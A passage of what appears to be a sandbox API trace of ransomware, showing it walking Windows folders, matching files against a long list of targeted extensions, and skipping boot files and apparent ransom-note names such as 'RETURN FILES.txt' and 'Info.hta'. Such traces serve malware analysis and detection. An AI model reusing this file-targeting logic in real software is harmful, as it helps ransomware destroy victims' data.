ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8b60 [0033.859] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.859] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0033.859] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0033.859] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0033.859] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0033.860] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0033.860] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2eb0088 [0033.860] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0033.860] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.860] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.860] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0033.860] lstrlenW (lpString="desktop.ini") returned 11 [0033.860] lstrlenW (lpString=".1cd") returned 4 [0033.860] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0033.860] lstrlenW (lpString=".3ds") returned 4 [0033.860] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0033.860] lstrlenW (lpString=".3fr") returned 4 [0033.860] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".3g2") returned 4 [0033.861] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".3gp") returned 4 [0033.861] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".7z") returned 3 [0033.861] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0033.861] lstrlenW (lpString=".accda") returned 6 [0033.861] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0033.861] lstrlenW (lpString=".accdb") returned 6 [0033.861] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0033.861] lstrlenW (lpString=".accdc") returned 6 [0033.861] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0033.861] lstrlenW (lpString=".accde") returned 6 [0033.861] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0033.861] lstrlenW (lpString=".accdt") returned 6 [0033.861] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0033.861] lstrlenW (lpString=".accdw") returned 6 [0033.861] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0033.861] lstrlenW (lpString=".adb") returned 4 [0033.861] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".adp") returned 4 [0033.861] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".ai") returned 3 [0033.861] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0033.861] lstrlenW (lpString=".ai3") returned 4 [0033.861] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".ai4") returned 4 [0033.861] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".ai5") returned 4 [0033.861] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".ai6") returned 4 [0033.861] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".ai7") returned 4 [0033.861] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0033.861] lstrlenW (lpString=".ai8") returned 4 [0033.862] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".anim") returned 5 [0033.862] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0033.862] lstrlenW (lpString=".arw") returned 4 [0033.862] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".as") returned 3 [0033.862] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0033.862] lstrlenW (lpString=".asa") returned 4 [0033.862] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".asc") returned 4 [0033.862] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".ascx") returned 5 [0033.862] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0033.862] lstrlenW (lpString=".asm") returned 4 [0033.862] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".asmx") returned 5 [0033.862] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0033.862] lstrlenW (lpString=".asp") returned 4 [0033.862] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".aspx") returned 5 [0033.862] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0033.862] lstrlenW (lpString=".asr") returned 4 [0033.862] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".asx") returned 4 [0033.862] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".avi") returned 4 [0033.862] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".avs") returned 4 [0033.862] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0033.862] lstrlenW (lpString=".backup") returned 7 [0033.862] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0033.862] lstrlenW (lpString=".bak") returned 4 [0033.862] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".bay") returned 4 [0033.863] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".bd") returned 3 [0033.863] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0033.863] lstrlenW (lpString=".bin") returned 4 [0033.863] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".bmp") returned 4 [0033.863] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".bz2") returned 4 [0033.863] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".c") returned 2 [0033.863] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0033.863] lstrlenW (lpString=".cdr") returned 4 [0033.863] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".cer") returned 4 [0033.863] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".cf") returned 3 [0033.863] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0033.863] lstrlenW (lpString=".cfc") returned 4 [0033.863] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".cfm") returned 4 [0033.863] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".cfml") returned 5 [0033.863] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0033.863] lstrlenW (lpString=".cfu") returned 4 [0033.863] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".chm") returned 4 [0033.863] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".cin") returned 4 [0033.863] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0033.863] lstrlenW (lpString=".class") returned 6 [0033.863] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0033.863] lstrlenW (lpString=".clx") returned 4 [0033.864] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".config") returned 7 [0033.864] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0033.864] lstrlenW (lpString=".cpp") returned 4 [0033.864] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".cr2") returned 4 [0033.864] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".crt") returned 4 [0033.864] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".crw") returned 4 [0033.864] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".cs") returned 3 [0033.864] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0033.864] lstrlenW (lpString=".css") returned 4 [0033.864] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".csv") returned 4 [0033.864] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".cub") returned 4 [0033.864] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".dae") returned 4 [0033.864] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".dat") returned 4 [0033.864] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".db") returned 3 [0033.864] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0033.864] lstrlenW (lpString=".dbf") returned 4 [0033.864] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".dbx") returned 4 [0033.864] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".dc3") returned 4 [0033.864] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".dcm") returned 4 [0033.864] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0033.864] lstrlenW (lpString=".dcr") returned 4 [0033.865] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".der") returned 4 [0033.865] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".dib") returned 4 [0033.865] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".dic") returned 4 [0033.865] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".dif") returned 4 [0033.865] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".divx") returned 5 [0033.865] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0033.865] lstrlenW (lpString=".djvu") returned 5 [0033.865] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0033.865] lstrlenW (lpString=".dng") returned 4 [0033.865] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".doc") returned 4 [0033.865] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".docm") returned 5 [0033.865] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0033.865] lstrlenW (lpString=".docx") returned 5 [0033.865] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0033.865] lstrlenW (lpString=".dot") returned 4 [0033.865] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".dotm") returned 5 [0033.865] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0033.865] lstrlenW (lpString=".dotx") returned 5 [0033.865] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0033.865] lstrlenW (lpString=".dpx") returned 4 [0033.865] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".dqy") returned 4 [0033.865] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".dsn") returned 4 [0033.865] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0033.865] lstrlenW (lpString=".dt") returned 3 [0033.866] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0033.866] lstrlenW (lpString=".dtd") returned 4 [0033.866] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".dwg") returned 4 [0033.866] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".dwt") returned 4 [0033.866] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".dx") returned 3 [0033.866] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0033.866] lstrlenW (lpString=".dxf") returned 4 [0033.866] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".edml") returned 5 [0033.866] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0033.866] lstrlenW (lpString=".efd") returned 4 [0033.866] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".elf") returned 4 [0033.866] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".emf") returned 4 [0033.866] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".emz") returned 4 [0033.866] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".epf") returned 4 [0033.866] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".eps") returned 4 [0033.866] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".epsf") returned 5 [0033.866] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0033.866] lstrlenW (lpString=".epsp") returned 5 [0033.866] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0033.866] lstrlenW (lpString=".erf") returned 4 [0033.866] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".exr") returned 4 [0033.866] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0033.866] lstrlenW (lpString=".f4v") returned 4 [0033.867] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".fido") returned 5 [0033.867] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0033.867] lstrlenW (lpString=".flm") returned 4 [0033.867] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".flv") returned 4 [0033.867] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".frm") returned 4 [0033.867] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".fxg") returned 4 [0033.867] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".geo") returned 4 [0033.867] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".gif") returned 4 [0033.867] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".grs") returned 4 [0033.867] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".gz") returned 3 [0033.867] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0033.867] lstrlenW (lpString=".h") returned 2 [0033.867] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0033.867] lstrlenW (lpString=".hdr") returned 4 [0033.867] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".hpp") returned 4 [0033.867] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".hta") returned 4 [0033.867] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".htc") returned 4 [0033.867] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".htm") returned 4 [0033.867] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0033.867] lstrlenW (lpString=".html") returned 5 [0033.867] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0033.868] lstrlenW (lpString=".icb") returned 4 [0033.868] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0033.868] lstrlenW (lpString=".ics") returned 4 [0033.868] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0033.868] lstrlenW (lpString=".iff") returned 4 [0033.868] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0033.868] lstrlenW (lpString=".inc") returned 4 [0033.868] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0033.868] lstrlenW (lpString=".indd") returned 5 [0033.868] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0033.868] lstrlenW (lpString=".ini") returned 4 [0033.868] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0033.868] lstrlenW (lpString="desktop.ini") returned 11 [0033.868] lstrlenW (lpString=".php") returned 4 [0033.868] lstrcmpiW (lpString1=".php", lpString2=".ini") returned 1 [0033.868] lstrlenW (lpString="desktop.ini") returned 11 [0033.868] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0033.868] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0033.868] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0033.868] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0033.868] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0033.868] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="desktop.ini") returned 1 [0033.868] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0033.868] lstrcmpiW (lpString1="MicosoftSearch.exe", lpString2="desktop.ini") returned 1 [0033.868] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.868] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0033.868] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.868] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.868] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0033.868] FindClose (in: hFindFile=0xba8b60 | out: hFindFile=0xba8b60) returned 1 [0033.869] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2ea0080 | out: hHeap=0xb10000) returned 1 [0033.869] FindNextFileW (in: hFindFile=0xba8b20, lpFindFileData=0x352fd00 | out: lpFindFileData=0x352fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0033.869] lstrlenW (lpString="C:\\Boot") returned 7 [0033.869] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0033.869] lstrlenW (lpString="Boot") returned 4 [0033.869] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0033.869] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2ea0080 [0033.869] lstrlenW (lpString="C:\\Boot") returned 7 [0033.869] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8b60 [0033.869] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.869] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0033.869] lstrlenW (lpString="BCD") returned 3 [0033.869] lstrlenW (lpString=".1cd") returned 4 [0033.869] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0033.869] lstrlenW (lpString=".3ds") returned 4 [0033.869] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0033.869] lstrlenW (lpString=".3fr") returned 4 [0033.869] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".3g2") returned 4 [0033.870] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".3gp") returned 4 [0033.870] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".7z") returned 3 [0033.870] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0033.870] lstrlenW (lpString=".accda") returned 6 [0033.870] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".accdb") returned 6 [0033.870] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".accdc") returned 6 [0033.870] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".accde") returned 6 [0033.870] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".accdt") returned 6 [0033.870] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".accdw") returned 6 [0033.870] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".adb") returned 4 [0033.870] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".adp") returned 4 [0033.870] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".ai") returned 3 [0033.870] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0033.870] lstrlenW (lpString=".ai3") returned 4 [0033.870] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".ai4") returned 4 [0033.870] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".ai5") returned 4 [0033.870] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".ai6") returned 4 [0033.870] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0033.870] lstrlenW (lpString=".ai7") returned 4 [0033.871] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".ai8") returned 4 [0033.871] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".anim") returned 5 [0033.871] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".arw") returned 4 [0033.871] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0033.871] lstrlenW (lpString=".as") returned 3 [0033.871] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0033.871] lstrlenW (lpString=".asa") returned 4 [0033.871] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0033.871] lstrlenW 